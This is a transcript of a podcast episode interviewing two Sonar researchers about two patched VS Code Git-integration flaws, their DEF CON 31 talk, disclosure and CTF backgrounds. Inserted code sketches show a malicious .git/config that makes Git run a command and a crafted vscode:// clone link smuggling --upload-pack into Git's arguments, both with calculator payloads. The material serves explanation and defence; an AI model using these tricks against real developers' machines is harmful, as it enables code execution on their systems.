The Hacker Mind: Hacking Visual Studio Code Extensions
Rather than use backdoor exploits, attackers are stealing credentials and going through the front door. How are they gaining credentials? Sometimes it’s from the tools we trust. Researchers Paul Gerste and Thomas Chauchefoin discuss their DEF CON 31 presentation Visual Studio Code is why I have (Workspace) Trust issues, as well as the larger question of how much we should trust the tools we depend on daily.
VAMOSI: In the book I wrote with Kevin Mitnick, The Art of Invisibility, we went around and around about password managers. Kevin supported them because they allow for complexity. I do not support them, because if an attacker went after that one password manager and was successful, then potentially all your passwords would be exposed. Very early on in my career at CNET, I found a bug in Norton Security Suite: by typing three random characters I could pop open the Norton Password Manager and see all the passwords I’d stored, in plaintext. So I haven’t been a fan of password managers since then.
What happens if you are a developer who needs access to a variety of systems, and your employer requires the use of a password manager? Well, that could get interesting.
In December of 2022, and again in February of 2023, LastPass, a password manager, disclosed that it had been breached, and potentially passwords for thousands of systems were exposed. The details are interesting. In the December 2022 disclosure, LastPass revealed that a threat actor had leveraged stolen information. The second disclosure, in February 2023, revealed that the attacker had used valid credentials stolen from a senior DevOps engineer whose personal home computer had been hacked and infected with a keylogger.
This is the new normal. Rather than develop a chain of zero days, or even use known exploits to break into a system, why not just walk in the front door with some senior developer’s credentials? It’s much easier. And it’s less noisy. Of course, the senior developer had access to the source code …
The point is, we tend to rely on tools out of convenience. Rather than develop a password schema and maybe only write down the first part of each password (which is what I recommend), there are password managers. And rather than parsing code from source, there are code editors. In a moment I’ll introduce you to two researchers who presented at DEF CON 31 on how a code editor used by 80% of the developer community had a flaw -- now fixed. It’s a reminder that even the tools we use and rely upon can sometimes be faulty.
[music]
VAMOSI: Welcome to The Hacker Mind, an original podcast from the makers of Mayhem Security. It’s about challenging our expectations about the people who hack for a living. I’m Robert Vamosi, and in this episode I’m discussing how there’s no standard threat model for code editors today, and how even the tools we use daily, sometimes without thinking, need to be checked for vulnerabilities.
[music]
VAMOSI: One of the more interesting talks at DEF CON 31 this year was entitled Visual Studio Code is why I have (Workspace) Trust issues. In their abstract, they state that modern development tools offer increasingly advanced features and deep integration with ecosystems, sometimes at the cost of basic security measures, and that code editors have tried to counterbalance this by introducing new lines of defense (e.g., "Workspace Trust"), leading to a cat-and-mouse game to restrict access while keeping most features available by default. I think you can see where there might be a problem. So I wanted to talk to the presenters to learn more about this trust issue.
GERSTE: Hi, I'm Paul Gerste. I'm a vulnerability researcher in Sonar's research and development team. And yeah, I love to break web things, especially in the JavaScript world. I used to be a developer, but then I got hooked on CTF competitions. Now I'm a researcher in the R&D team, and instead of solving challenges and writing write-ups, I audit open source projects and write blog posts about them.
CHAUCHEFOIN: And my name is Thomas Chauchefoin. I'm French, as you may guess, from the south of France, where every day is sunny. I've been in the security industry for six years now, and I've been doing vulnerability research at Sonar for two years. I actually joined the same day as Paul, and we share the same passions and roughly the same work.
VAMOSI: Sonar is a company that looks for Security Vulnerabilities and Hotspots in code review with Static Application Security Testing (SAST).
CHAUCHEFOIN: Sonar helps developers write clean code. And by clean code, we mean code that's of quality, so you have fewer functional bugs, and also code that's safe, so you have fewer security bugs and vulnerabilities. We're trusted by more than 7 million developers, and we're pretty proud of what we're doing.
VAMOSI: So, before we get started, I wanted to establish that both of these men started with Capture the Flag competitions before becoming professional security researchers. In early episodes of The Hacker Mind I talked with members of the Plaid Parliament of Pwning, the team that has won the most DEF CON CTFs; some of those members today work for the NSA and Google. So I asked Paul and Thomas about the CTF scene in Europe and how it might be a different experience. Or not.
GERSTE: Yes, so I'm from Germany. And in Germany, we actually have quite a good and strong CTF scene, I would say. I got into it when I started my studies in IT security, here in Bochum, Germany. We have a student team called FluxFingers, and we do a thing called Flux Rookies, where we introduce new people to the CTF scene, because it can be quite hard: the top players that are experienced want hard challenges, and if you're starting out, you will probably run against a wall and it won't be fun. So we try to have beginner-friendly challenges, and we help people out. That's how I got started. And I think a lot of the teams in Germany and throughout Europe are based on student teams, university teams, because there you have the local thing where you can join together, meet up, play together, which is always more fun than over Discord or online.
VAMOSI: So Paul’s from Germany. Thomas is from France.
CHAUCHEFOIN: I think it's roughly the same thing in France, right? We all start as students, and we don't know it's a profession yet. So we just have fun, we play, we discover new stuff. I think we build knowledge with CTFs all the time. In my case, my only exposure to security before working in this industry was through CTFs. So everything I knew at the time was thanks to CTFs.
VAMOSI: Are there any major CTF competitions in Europe that I might not have heard of?
GERSTE: So there's this website called CTFtime, where there's a list of all the big CTFs. You can rate them, and they have a rating score where you can see which ones are rated higher and which ones lower. So you can go on there to see, for example, the CTF that my team and I are hosting, the Hack.lu CTF. It's pretty old; we've run it since 2011, and it's also one of the highest-rated ones. Then of course in other regions of the world there's, for example, DEF CON CTF, where you have the very prestigious names, and also recent additions from the Asian region. Real World CTF is a pretty cool one that happens every year. As the name suggests, it's very close to the real world: they have one-day challenges, or sometimes even zero-day challenges, where they just give you a piece of software, in the latest version and maybe a slightly weird configuration, and then they say, let's go, you need to find a way to get remote code execution. So it's becoming very close to the real world.
VAMOSI: So how does one take experience with CTFs and turn it into a career?
GERSTE: Yeah, I guess as Thomas already said, you start out just to have fun, just to play, just to see what's going on, and then you learn a lot of your practical skills. For me, I was playing while studying. So in university I got the lectures and the formal education, everything in theory, and then I could use some of that in practice and learn even more practical skills with CTFs. I think there's a big difference between hearing about something in a lecture, or doing a small exercise on it, and actually going through the full path of finding a vulnerability, exploiting it, and maybe reporting it or writing it up. So yeah, you learn a lot there. And then at some point the world becomes the challenge, if you want to say so, where you can just take any open source project and start auditing. But of course, in a CTF you know there is something, and in the real world you don't. There probably is always something, but you don't really know. During my CTF career, if you want to call it a career, I also built up a high frustration tolerance. If you play a 48-hour CTF, of course with sleeping breaks, and you don't find anything, playing one challenge for two days straight can be pretty frustrating. But still, you learn a lot along the way, about new technologies, or about things that don't work, and the next time you know they don't work. And in the end, you can read somebody else's write-up, and then you learn what the vulnerability was and how to exploit it.
VAMOSI: In episode 09 of The Hacker Mind I talked with someone who traveled the world with HackerOne, getting paid to find bugs in various code bases. So have either of you done bug bounties?
CHAUCHEFOIN: Oh, yeah, I did some bug bounty in the past, and I don't do it anymore. There are different kinds of bug bounty practice. There are the famous ones, the big crowdsourced platforms like HackerOne, which are mostly web bug bounties, and there are also competitions like Pwn2Own, which are a way to sell bugs that will then be disclosed. I stopped doing the web bug bounties because most of the time it's only black-box auditing: they give you websites and you have to break into them, but you don't get access to source code or anything, and I find that much less fun. I really love to have code and just dig into it, try things; I find it more creative and less obvious. But we played Pwn2Own together with what is now our R&D team, which was pretty cool, a different kind of target than the ones we're used to. So we can call that bug bounty.
GERSTE: Speaking of bug bounty, sometimes we also do get bug bounties for the things we report from our Sonar work. Every time we find something, we report it, and some of the projects do have a bug bounty. One cool one was the bounty we got from Microsoft for one of the things we found in Visual Studio Code. It was a $30,000 bug bounty, which we gave to charity. And it's also quite a fun story, because one year later we found something with the same impact, and they said, oh, wait a minute, last time we basically awarded this in error, so sorry, you're not getting it this time. So sometimes we even get unlucky like that. And I also have to say I prefer the way we do it right now: we get paid to just do the research, so we're not dependent on the bounties like you would be if you were a full-time bug bounty hunter. This allows you to go much more in depth on certain topics, and not just hunt all the low-hanging fruit to get something.
CHAUCHEFOIN: You're also not being driven by the same incentives, right? You're not looking for money, you're looking for bugs, you're looking to improve the security of these products and projects. You're not just trying to make money. So it's also less frustrating when things go wrong, which happens a lot, because you're not counting on getting paid for any of it. So this is the best way to do bug bounty, in a way: not needing the money.
[MUSIC]
VAMOSI: The presentation that Paul and Thomas gave at DEF CON was about two vulnerabilities in Visual Studio Code's Git integration. These are CVE-2021-43891 and CVE-2022-30129. This was a case where they found and reported one vulnerability, and then a year later found another vulnerability similar to the first.
GERSTE: It's called an extension, but in practice it's a built-in module that you can disable. So Microsoft calls it an extension, but in practice it's just a feature of the code editor.
VAMOSI: So why were you looking at this? What led you to start investigating this?
CHAUCHEFOIN: I would say it's the most popular IDE right now, at least in certain language communities. A lot, a lot of people are using it. So it's a big impact if you find something in there, right? Because you directly affect almost 80% of all developers, essentially. So it's a pretty interesting target just because of that. And then it's also a big codebase, I think 800,000 lines of code, so there's a lot of opportunity for stuff to go wrong. That's why we wanted to look into it. And we also saw other people, other researchers, find bugs in there, and some of them looked interesting, because there's a lot of different attack surface. In general, this is a tool for developers. It's not like a server that's running somewhere that you can directly attack over the internet; it's something people run on their own machines. So it's also an interesting context, an interesting threat model, let's say, because for a lot of developer tools it's not very clear what's the responsibility of the tool and what's the responsibility of the developer. Should I open this unknown file with my IDE? Can something go wrong? Is it my responsibility to not do it and to vet the file first, or is my IDE safe enough to block anything malicious? So it was also interesting to us.
VAMOSI: This brings up a good point. If you want to attack a vendor, you might want to go through the developers writing code for that vendor’s product.
GERSTE: And we've seen a lot of in-the-wild campaigns against developers. I think the most recent example, and maybe the most famous one, was LastPass. That was a one-day vulnerability that got exploited; we don't have all the details, but they didn't need a zero day. They exploited it against a DevOps engineer who was working for LastPass: they broke into his home network from the outside, they got access, I think through some keylogging, to the work laptop, and then from there they got access to LastPass production servers. So in the end, if you compromise developers, you will likely get access to production systems, you will likely get access to source code, which is a big asset for companies these days, and you will maybe get access to secrets, API keys, everything. It's very impactful to go after these targets.
VAMOSI: By now we should all know about Zero Days, but Paul mentioned One Day and so I want to get his definition of that.
GERSTE: So I think, in general, we call a zero day everything that's not known outside of a small private circle. I think the name comes from the notion that you had zero days to protect yourself against the vulnerability: it just came out publicly, and there is no available workaround or patch. We also use this terminology to say that a zero day is something that maybe your friends know, your colleagues know, but the public is not aware of the vulnerability, so nobody can protect themselves against it. And a one day, which we can also call an N day, to say it was one day, two days, three days, any number of days you want, is something that's known and publicly tracked; it likely got a CVE ID, and maybe a patch is available, maybe workarounds. But maybe in this case the patch was not deployed, it wasn't applied on a given system, so you can still break into the system with a one day.
VAMOSI: So you've targeted this system, which is used by 80% of the developers. I imagine, given that it's used by so many people, that it's fairly hardened. But you must find some areas that are less locked down and then you just pursue that until you find some bugs that are interesting. You must go through a lot of bugs that aren't interesting.
CHAUCHEFOIN: Yeah, and like Paul said, it's 800,000 lines of code. It's huge; you could build small operating systems with far fewer lines of code. It's a huge project, so there will be bugs, and like you say, there will be useless bugs, too. But for us, what was interesting is that for such tools, you want deep integration with ecosystems, with every language, and VS Code supports many, many languages. I think it's one of the reference code editors for JavaScript and TypeScript, and I know a lot of people do PHP in it. And you need to integrate with all these ecosystems to offer features: to help you download dependencies, to scan your code, to help you develop faster and better. Because of this deep integration, it's also easier for attackers to find security flaws, because you will be calling a lot of external binaries. You will be trying to do your best to give a lot of information to the user, but to collect that information you may need to run code that comes from the user's local project, and you may need to call remote servers and exchange information with them. A lot of things will be happening, and a lot of these things aren't really under the control of the VS Code developers. In our case, we found the vulnerability in the Git extension. And what's critical is that if you're a VS Code developer writing the Git extension, you call Git, and Git does all the Git-related work for you; you don't need to reimplement Git inside VS Code. But it also means that every single vulnerability that affects Git will affect VS Code, and you cannot do anything as a developer to prevent this from happening, except not calling Git anymore. But you need it to facilitate integration with projects and the usual developer workflows. So it's a weird trade-off: I need to do complex and maybe security-sensitive things to be nice to the user, and I have no control over all these binaries and all these other components working internally. So it's really hard to make everything safe, to know what to look at.
[Music]
VAMOSI: So, we’ve talked about Microsoft, but remember this is also a Git problem. I asked Thomas and Paul to explain. Was this an integration flaw with Git, or was it an actual code flaw?
CHAUCHEFOIN: So we found two bugs in the Git extension. The first one was directly related to Git. When you develop with Git, you can configure the tool. You can have a system-wide configuration for your whole system, all users. You can have a user-specific configuration in your home folder to, I don't know, set your own name and email address for when you commit, or just general Git features. And then there's the project's configuration, the .git folder that comes with your project. And there are quite sensitive options that you can set in these configuration files. For instance, in our case, we demonstrated that if you send somebody a Git project with some additional configuration, you can make Git execute malicious commands. Once they open it in VS Code, VS Code directly runs Git and says, can you please look into this folder and run some actions, like give me a status update of all files that were modified since the last time I looked. And because Git uses this malicious configuration, we were able to force the user to execute arbitrary commands on their system, which is never something that you want. They fixed it by first asking whether you trust a folder or not, so you can trust your workspace. If you don't trust the folder, this extension won't run anymore, so it's kind of safe. But if you click trust, this behavior is still present. So the idea of this new trust-based system is to let you evaluate the situation: do I know where this is coming from, or is it just a random zip file from the internet? And depending on this choice, VS Code will take riskier or less risky actions. Should it run Git for you? Yes, please.

The second one was related to protocol handlers. You know, when you go to your web browser and type https://, it's an HTTPS link; the browser knows it will have to connect to the internet, do a DNS query, do the HTTP query over SSL, and display the results. But if you type something like file://, the browser says, OK, the user wants to access a file on the system, so I will display this file. And every app on the desktop can register these protocol handlers. In the case of VS Code, it registers vscode://, and it's really practical, really useful for developers. If you've got a Git hosting instance, you get this "clone in my IDE" button. It's a vscode:// link; it will launch VS Code, and VS Code says, OK, somebody's trying to clone a Git repository. Do you want to clone this folder? Yes. Where do you want to clone it? Put it on my desktop, for instance. And then it calls Git to clone the repository. And we found that in the way this operation was done, it needs the address of the repository to clone, and it needs to give it to Git, but the way it's done, we could inject additional arguments into the Git invocation. We could trick Git into executing arbitrary commands instead of cloning the repository. So basically, you would go online on GitLab or GitHub, you would see this "clone with my IDE" button, and you would click it; if you accept cloning the repository, an arbitrary command would be executed instead. And it looks trustworthy, obviously. So it requires interaction, but it's something that's part of everybody's workflow. I use it personally. Or maybe I use it a bit less now. But it's something that's made to be useful. It's made to be part of your workflow, it's made to make your life easier. So everybody's using this kind of feature. And it's really hard to defend against, except if you stop clicking every single link, which is not easy.
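To make the first bug concrete: Git will run commands whose names appear in certain configuration keys, and a repository carries its own .git/config. The conversation doesn't name the exact option involved in CVE-2021-43891, so take core.fsmonitor below as an assumed stand-in; it's a well-known example of a Git config key whose value gets executed as a command, and the calculator is the benign payload the researchers describe.

```
# .git/config shipped inside a malicious repository (hypothetical sketch)
# core.fsmonitor can hold a command Git runs to detect changed files,
# so a "git status"-style query in this repo executes the value.
[core]
	fsmonitor = "open -a Calculator"   # macOS payload; calc.exe on Windows
```

And here is a rough sketch of the shape of the second bug, the protocol-handler one. The handler and parameter follow VS Code's public vscode://vscode.git/clone deep link, and --upload-pack is a classic argument-injection gadget because git clone treats its value as a command to run; the exact payload used in CVE-2022-30129 may differ, so read this as illustrative:

```
# A normal "clone in VS Code" link looks something like:
#   vscode://vscode.git/clone?url=https://example.com/project.git
# If the url value reaches Git's command line unsanitized, a crafted link
# can smuggle an option in where a repository address was expected:
vscode://vscode.git/clone?url=--upload-pack=calc.exe
```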
VAMOSI: I also wanted to know what sort of tools they used to discover this vulnerability. In other words, are you parsing those 800,000 lines statically? Are you using dynamic tools like fuzzing, or other things?
CHAUCHEFOIN: So first of all, the first thing we do in every audit is we use our own product, which is a static analysis tool, to check the code for us. If it finds something, we can verify it and directly report it. And if it doesn't find anything, which I think never happens (it always finds at least something that we can then look more into), then we have to do it manually. We also use code editors, or code viewers in our case, since we don't edit the code; we just read a lot of it. And then, of course, we also set up the application with a debugging setup so we can poke at it a little bit dynamically. But yeah, regarding tools, it's our own static analysis engine and code editors.
GERSTE: And debuggers, I guess. And what's cool with VS Code is that we've basically been looking at the code of VS Code in VS Code, and we can also debug VS Code with VS Code's debugging features. That's why it's so practical and everybody loves it, right? It's really well integrated. Even for us, when you do security research on such things, getting the right debugging setup, and even being able to build the project, can take some time; it can be a tedious task. In the case of VS Code it was really, really easy and useful.
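If you want to reproduce that setup, VS Code is open source. Per the project's contribution docs around that time, building and launching a debuggable instance from source went roughly like this; treat the exact commands as a sketch, since the build tooling evolves:

```
# Build and run VS Code from source so you can debug it with itself (sketch)
git clone https://github.com/microsoft/vscode
cd vscode
yarn                # install dependencies
yarn watch          # incremental build; leave this running
./scripts/code.sh   # launch the development build (scripts\code.bat on Windows)
```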
VAMOSI: So you get these bugs, you're going through them, and you find one that's interesting. Walk me through the timeline: when did you realize that this was the real thing? And how short a time was it before you contacted Microsoft with a proof of concept?
CHAUCHEFOIN: So we've been reporting so many vulnerabilities in the past few years we've been in the research and development team that we have a well-established disclosure process. Once we have a bug we think is exploitable, we confirm it. We try to keep it, let's say, nice: in practice, we're not distributing malware or anything, we're just popping a calculator, which shows that we could force the user to execute commands. A simple calculator is nothing crazy, but it's visual, and you see and you know that the command was correctly executed. So once it was confirmed, we went through the MSRC platform. It's like a bug bounty platform, but specific to Microsoft: you register, you create a new submission, and you put in all the details. So we have a small advisory with our observations: what's the impact of the vulnerability, how can you exploit it, and how we think it should be remediated. We sent all this information for the two bugs. So between the discovery of a bug and the time we create a new submission on the platform, it's only two or three days; it's easy for us to write it up and send it. And then I think Microsoft tries to apply a 120-day kind of disclosure policy, though I don't think they apply it for every single bug; basically, they promise they will get back to you in a short amount of time. In our case, everything was fixed within, I would say, two months, which is quite efficient, because internally it needs to get dispatched from the security team to the developers, and then the developers need to think, OK, next sprint I'm going to fix it, and then they need to fix it, and it has to go through reviews. And when you fix a security bug, you don't want to leave the patch out in the open for everyone to see; you want to directly release a new version that everybody can install and update to, to benefit from the patch. So all these things need to align with release dates and everything. A two-month turnaround is impressive for a company like Microsoft. And for us, it's perfect, because we use a 90-day disclosure policy. I think it's pretty standard in the industry; Google Project Zero has been using it for a long time now. Basically we say, OK, we give you 90 days to fix it. If you patch everything before then, it's all good, everybody's happy. Along the way we come back to you and say, did you start working on it? Can we help? Can we maybe give you a patch, can we make things faster? And if after these 90 days nothing was fixed, we may release the advisories so people are able to defend against the bugs, because if the bugs get exploited in the wild, or are already known by other people in the space, users may get attacked, and we want to give users ways to protect themselves. But in the end, Microsoft was always on time, and they always fixed everything.
VAMOSI: I asked Paul what the process of reporting to Microsoft was like, and what feedback they received.
GERSTE: Oh, I would say that's pretty much it. I mean, this was specific to Microsoft, but it's pretty similar with all the other vendors. Some of them are really responsive; I think the record was that things were fixed and deployed hours after our report, which is very cool to see. Sometimes they do take more time, and sometimes we have to nag them a little via email: hey, do you have any patches? Please fix this. But in the end, almost every vendor fixes the vulnerabilities we report. So it's nice to see the impact, that the whole ecosystem is getting more secure through this.
VAMOSI: So did you get one or two CVEs out of this?
CHAUCHEFOIN: So we got two CVEs. The bug class, the reason why the bug exists, is different for the two cases. So even though they're kind of close in the code and have kind of the same consequences, they got two distinct CVEs.
CHAUCHEFOIN: So the first bug, the one that was using the Git local configuration, got a CVSS of 7 or 8, and the second one, based on protocol handlers, got a CVSS of 8.8. And I think we still need to mention that these cases require interaction from the user: you need to clone or import something somebody sent you or posted somewhere, and in the case of a link, you need to click the link and do a few actions. So it requires interaction; it's not, you know, a zero-click RCE or something. But I think in the context of a code editor, that's fine. It's an action you're going to do in your day-to-day workflow anyway, so we can say it's still a risk. And there's also the attack vector in the CVSS: it can be local, it can be network. It's called remote code execution, but I think a proper term for it would be arbitrary code execution. It's "remote" because the attacker is remote, not because from a remote position they can directly attack you, right? Because of the interaction requirements. So the CVSS for these kinds of issues can be tricky to get right; I think it's one of the pitfalls of the CVSS system. Still, it tells you that you may want to update your VS Code instance.
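For reference, 8.8 is what the CVSS 3.1 formula yields for a network-reachable, low-complexity, full-impact bug once user interaction is factored in. The vector below is the generic one that scores 8.8, shown for illustration; the published vectors for both CVEs are on NVD.

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H   ->  8.8 (High)
# AV:N  attacker reaches you over the network   UI:R  user interaction required
# PR:N  no privileges needed                    C/I/A:H  full impact once triggered
# The same vector with UI:N (no interaction) would score 9.8, Critical.
```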
VAMOSI: So it's going to show up high on any sort of reporting system as one that you should pay attention to.
CHAUCHEFOIN: Yeah, right. And you should take care of it and update everything.
[Music]
VAMOSI: So you’re a security researcher, and you’ve found two vulnerabilities in Visual Studio Code, which is used by roughly 80% of the developer market. What would be the dangerous scenario for anyone not patching this? How would they be vulnerable to having remote code executed?
CHAUCHEFOIN: Yeah, absolutely. Once again, it's because of actions that are part of your normal workflow. I would maybe clone some dependency to review it in my code editor, because, I mean, all developers are using code editors. We are security researchers, and we also use code editors to read code, because that's what they're for. So every time you want to read code that you don't trust, it's tricky, right? Because you're opening unsafe code, and if you trust the folder a bit too much, if the dialog asks whether you trust this folder and you say yes, you're going to get compromised. So that's where it gets tricky.
GERSTE: And it's not only IDEs, right? Thomas and I also found a similar vulnerability in command-line shells and shell integrations. If you have your command-line prompt show the current branch, or whether files have been modified or not, that will run the same Git commands under the hood. So instead of opening a potentially malicious folder with your IDE, where you might think, OK, maybe my IDE does something not so good here, you might choose to only go into the folder in your command line. And even that could get you compromised. I think most people would think, oh, I'll only enter the directory with my shell and maybe use the cat command-line utility to look at the contents of a file, nothing can go wrong. But even there, something could bite you.
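Here's a minimal sketch of the kind of shell integration Paul means, assuming bash and the same command-executing config key used as the example earlier. The prompt function runs Git in whatever directory you just entered, and Git reads that directory's local configuration:

```
# Hypothetical bash prompt integration (sketch): runs git on every prompt
__git_prompt() {
  local branch dirty
  branch=$(git rev-parse --abbrev-ref HEAD 2>/dev/null) || return
  # Checking for modified files is exactly the kind of query that can
  # trigger command-executing options in the repo's own .git/config:
  dirty=$(git status --porcelain 2>/dev/null | head -n 1)
  printf '(%s%s)' "$branch" "${dirty:+*}"
}
PS1='$(__git_prompt)\$ '
# cd into a downloaded repo, press Enter, and git has already run there.
```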
CHAUCHEFOIN: I would say, yeah, it showed us again that in the world of developer tools, there is no clear boundary of responsibility between the user and the tools, and for every tool it's a bit different. So as a developer, or anybody who uses developer tools, you really have to be careful when you use third-party projects, files, or code.
VAMOSI: Yeah, it's the classic trade off between convenience and security.
CHAUCHEFOIN: So we also reported this kind of behavior to the Git maintainers. We said: at no point should Git execute things on my behalf just because I got a repository from the internet and went into the wrong folder with my tools. Maybe it should be disabled by default; maybe Git should only parse the system-wide configuration and the user-wide configuration, and by default never run or take anything from the local configuration unless I explicitly trust it. Kind of like VS Code's Workspace Trust feature, but for Git directly. But they said no: if you trust somebody or something enough to get their code from a remote location, we believe it's on you. You have to be aware of this pitfall. And that's where we kind of disagree, because every time we present this behavior to people, to developers, to security experts, everybody gets surprised. You never expect that, by default, some tool would help somebody compromise your system. The developers of Git say no, it's part of the threat model. But it's not part of the threat model that everybody has in mind when they use Git. And that's why this slight distinction is really important for security: if nobody is aligned on what should be safe and what should not be safe, everybody will get surprises, and it's not the kind of surprise I want to get.
VAMOSI: So what’s the general takeaway from this?
CHAUCHEFOIN: I think a good takeaway from this research is that, basically, if you don't trust a Git repository, you should not use Git on it. And Git is everywhere: it's in your code editor, it's in your shell prompt, it's in every single developer tool. The thing is, it's currently unsafe to use Git with repositories that you don't trust. So it's something to be aware of. And while VS Code shows you these prompts before running the Git action, asking whether you trust a folder or not, for many of the tools that's not the case: they don't have the same trust-based system, they just run commands directly, like Paul was saying with the shell prompt. That means if I have a fancy terminal (as a developer I like to have fancy stuff, and even as a security researcher I like fancy stuff on my laptop), and I just cd into the wrong folder that I got from GitHub or anywhere, I get compromised. It shouldn't be that easy. And I think this is where we have this weird trade-off: I want deep integration with everything, but I want to be safe. It's kind of exclusive; you cannot get the best of both worlds. You need to remove some fancy features of your favorite tools if you want to be safe. And if you know that everything you open comes from your colleagues and you trust them, you trust everybody, you maybe get nicer tools and visualizations, but it's really hard to depend on that for security. For me, I would like to see this trust-based system, but you have to use it right. And I think, in general, editors shipping these tools should embed these trust-based features to tell you: if you click yes, it's on you and you may get compromised. Because I still think that when you get this kind of screen, you will likely want to say yes, because this weird screen is bugging you and you don't want to take the time to read everything. I have done it all the time, and now I've stopped, because I know it's really unsafe to do. And I think, in general, everybody should be upfront about this stuff: if you click yes, something bad could happen, and it's on you.
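One practical habit follows from that takeaway, sketched here under the assumption that you haven't let any tool touch the repository yet: inspect what an untrusted clone would feed to Git before opening it in an editor or cd-ing into it with a decorated shell. Plain cat and ls don't parse or execute any of it.

```
# Inspect a downloaded repo without invoking git (sketch)
cat untrusted-repo/.git/config     # look for command-like option values
ls -l untrusted-repo/.git/hooks    # look for executable hook scripts
```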